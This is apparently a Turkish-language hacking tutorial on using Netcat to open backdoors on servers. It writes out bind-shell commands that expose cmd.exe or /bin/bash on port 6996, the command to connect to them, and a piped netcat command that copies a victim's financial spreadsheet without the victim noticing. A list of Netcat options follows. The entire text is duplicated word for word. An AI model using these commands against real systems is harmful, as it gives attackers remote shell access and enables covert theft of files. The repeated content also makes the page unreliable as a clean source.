bugün size back door ve servere sızmak için kullanılan bir teknik anlatacağım umarım anlaşılır olur.
Netcat bi telnet clientidir. İlk çıktığı zamanlar Unix işletim sistemlerinde
kullanılıyordu, zamanla windows kullanıcıları içinde uygun hale getirildi. Bu programı
nelerde kullabiliriz derseniz bi serverda yada sistemde diyelim backdoor yani arka kapı açıp arka kapıdan içeri girmemize yani o servera bağlanmamız için yardımcı programdır.
Bi serverda 21 portunu açtığınızda kendi makinanızdan o servera bağlanmak için;
Başlat/Çalıştır/nc –v –l –p <21> yazıp bağlanabilirsiniz.
veya Başlat/Çalıştır/nc -vv -l -p <21> yazıp bağlanabilirsiniz
80 Portunu kullanarak bir server’a bağlanalım
nc BağlanacağımızServer Portumuz
nc 192.168.1.105 80
Bu bize 192.168.1.105 adresindeki web sunucusuna varsayılan bir TCP bağlantısı, (port 80) verir. bize verileri web sunucusuna doğrudan gönderilir.
Şimdi netcat ile backdoor oluşturalım
Windows Kullanıyorsak;
nc -l -p 6996 -e cmd.exe
Linux Kullanıyorsak;
nc -l -p 6996 -e / bin / bash
Daha sonra kendi makinanızda;
nc KarşıMakınaIp 6996
nc 192.168.1.105 6996
Bu komut karşı makinayla aranızda bir bağlantı sistemi açacaktır.
Karşı Serverdaki Dosyaları Kendi Sistemimize Kopyalama İşlemi;
Bağlandığımız 6996 port sayesinde kurbanın sisteminde bulunan dosyaları kurban fark etmeden kendi makinamıza alabiliriz bunun için
type financialprojections.xls | nc 192.168.1.104 6996 komutu kendi makinamızda girerek bu işi halledebiliriz bu komutla karşı makinadaki "financialprojections.xls" excel dosyasını kendi makinamıza indireceğiz.
Karşı Servera Gireceğimiz Komut;
nc -l -p 6996 > financialprojections.xls
Anlattıklarım sadece bu programla neler yapabileceğinizin örneğidir. Diğer Netcat Komutları;
-l: (listen mode) dinleme modu
-L: (Listen harder) Netcat’in sadece windows için hazırlanan sürümlerinde geçerlidir. Client tarafı connection’ı sonlandırsa bile dinleme modunu tekrar başlatır. Böylece Netcat’i ısrarlı bir dinleyici haline getirmiş olur.
-u: (UDP mode) ön tanımlı olarak TCP gelir. Bunun yerine UDP kullanmak için bu opsiyonu kullanabiliriz.
-p: (Local port) Listen modundayken dinlenen portun, client modundayken tüm paketlerin gönderileceği kaynak portun belirtildiği opsiyondur.
-e: Eğer connection olursa sonrasında program çalıştığında STDIN ve STDOUT ile iletişim kurmak için kullanılan opsiyondur.
-n: DNS lookup’larda diğer tarafın makinelerinin isimlerinde değişikliklik/oynama olamaması için kullanılacak opsiyon.
-z: Zero-I/O modudur. Herhangibir datanın yollanmamasıdır. Sadece payload dışında bir paketin yollanması için kullanılan opsiyondur.
-wN: Connection’ın timeout olması yani süresinin dolması halinde STDIN kapandıktan sonra N saniye daha beklenir. Bir Netcat client ya da listener’ı bu opsiyon ile yeni bir connection açmak için N saniye bekleyecektir. Eğer bu süre içinde yeni bir connection oluşmazsa Netcat çalışmayı durduracaktır.
-v: (Be verbose) Connection sırasında Standard Error’da olan mesajların ayrıntılı biçimde yazılmasını söyleyen opsiyondur.
-vv: (Be very verbose) Standard Errror’da -v opsiyonundan daha daha fazla detaylı yazılmasının söylendiği opsiyonel durumdur.
Opsiyon çeşitlerimiz bunlardı. Şimdi opsiyonları anlatırken Client ve Listener modlarından bahsetmiştik onların temel ifade edilişlerini inceleyelim:
– Temel Netcat Client:
$ nc [Hedef IP adresi] [Port]
Burada client modda hedef IP üzerindeki istenilen portta bir connection başlatmış oluruz.
– Temel Netcat Listener
$ nc -l -p [Local Port]
Burada listener modunda istenilen yerel portta bir Netcat Listener’ı oluşturmuş oluruz.
Hem client hem de listener modda veri STDIN’den alınır ve network’den STDOUT’a verilir
Netcat bi telnet clientidir. İlk çıktığı zamanlar Unix işletim sistemlerinde
kullanılıyordu, zamanla windows kullanıcıları içinde uygun hale getirildi. Bu programı
nelerde kullabiliriz derseniz bi serverda yada sistemde diyelim backdoor yani arka kapı açıp arka kapıdan içeri girmemize yani o servera bağlanmamız için yardımcı programdır.
Bi serverda 21 portunu açtığınızda kendi makinanızdan o servera bağlanmak için;
Başlat/Çalıştır/nc –v –l –p <21> yazıp bağlanabilirsiniz.
veya Başlat/Çalıştır/nc -vv -l -p <21> yazıp bağlanabilirsiniz
80 Portunu kullanarak bir server’a bağlanalım
nc BağlanacağımızServer Portumuz
nc 192.168.1.105 80
Bu bize 192.168.1.105 adresindeki web sunucusuna varsayılan bir TCP bağlantısı, (port 80) verir. bize verileri web sunucusuna doğrudan gönderilir.
Şimdi netcat ile backdoor oluşturalım
Windows Kullanıyorsak;
nc -l -p 6996 -e cmd.exe
Linux Kullanıyorsak;
nc -l -p 6996 -e / bin / bash
Daha sonra kendi makinanızda;
nc KarşıMakınaIp 6996
nc 192.168.1.105 6996
Bu komut karşı makinayla aranızda bir bağlantı sistemi açacaktır.
Karşı Serverdaki Dosyaları Kendi Sistemimize Kopyalama İşlemi;
Bağlandığımız 6996 port sayesinde kurbanın sisteminde bulunan dosyaları kurban fark etmeden kendi makinamıza alabiliriz bunun için
type financialprojections.xls | nc 192.168.1.104 6996 komutu kendi makinamızda girerek bu işi halledebiliriz bu komutla karşı makinadaki "financialprojections.xls" excel dosyasını kendi makinamıza indireceğiz.
Karşı Servera Gireceğimiz Komut;
nc -l -p 6996 > financialprojections.xls
Anlattıklarım sadece bu programla neler yapabileceğinizin örneğidir. Diğer Netcat Komutları;
-l: (listen mode) dinleme modu
-L: (Listen harder) Netcat’in sadece windows için hazırlanan sürümlerinde geçerlidir. Client tarafı connection’ı sonlandırsa bile dinleme modunu tekrar başlatır. Böylece Netcat’i ısrarlı bir dinleyici haline getirmiş olur.
-u: (UDP mode) ön tanımlı olarak TCP gelir. Bunun yerine UDP kullanmak için bu opsiyonu kullanabiliriz.
-p: (Local port) Listen modundayken dinlenen portun, client modundayken tüm paketlerin gönderileceği kaynak portun belirtildiği opsiyondur.
-e: Eğer connection olursa sonrasında program çalıştığında STDIN ve STDOUT ile iletişim kurmak için kullanılan opsiyondur.
-n: DNS lookup’larda diğer tarafın makinelerinin isimlerinde değişikliklik/oynama olamaması için kullanılacak opsiyon.
-z: Zero-I/O modudur. Herhangibir datanın yollanmamasıdır. Sadece payload dışında bir paketin yollanması için kullanılan opsiyondur.
-wN: Connection’ın timeout olması yani süresinin dolması halinde STDIN kapandıktan sonra N saniye daha beklenir. Bir Netcat client ya da listener’ı bu opsiyon ile yeni bir connection açmak için N saniye bekleyecektir. Eğer bu süre içinde yeni bir connection oluşmazsa Netcat çalışmayı durduracaktır.
-v: (Be verbose) Connection sırasında Standard Error’da olan mesajların ayrıntılı biçimde yazılmasını söyleyen opsiyondur.
-vv: (Be very verbose) Standard Errror’da -v opsiyonundan daha daha fazla detaylı yazılmasının söylendiği opsiyonel durumdur.
Opsiyon çeşitlerimiz bunlardı. Şimdi opsiyonları anlatırken Client ve Listener modlarından bahsetmiştik onların temel ifade edilişlerini inceleyelim:
– Temel Netcat Client:
$ nc [Hedef IP adresi] [Port]
Burada client modda hedef IP üzerindeki istenilen portta bir connection başlatmış oluruz.
– Temel Netcat Listener
$ nc -l -p [Local Port]
Burada listener modunda istenilen yerel portta bir Netcat Listener’ı oluşturmuş oluruz.
Hem client hem de listener modda veri STDIN’den alınır ve network’den STDOUT’a verilir
